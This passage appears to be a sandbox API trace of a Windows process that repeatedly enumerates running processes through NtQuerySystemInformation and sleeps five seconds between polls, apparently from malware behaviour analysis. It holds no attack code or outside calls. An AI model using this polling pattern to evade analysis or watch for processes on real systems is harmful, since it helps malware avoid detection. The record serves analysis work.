NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.091] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.108] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.124] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.139] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.154] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.179] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.193] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.201] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.216] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.231] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.409] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.425] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.446] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.466] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.483] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.497] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.516] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.529] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.555] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.567] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.595] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 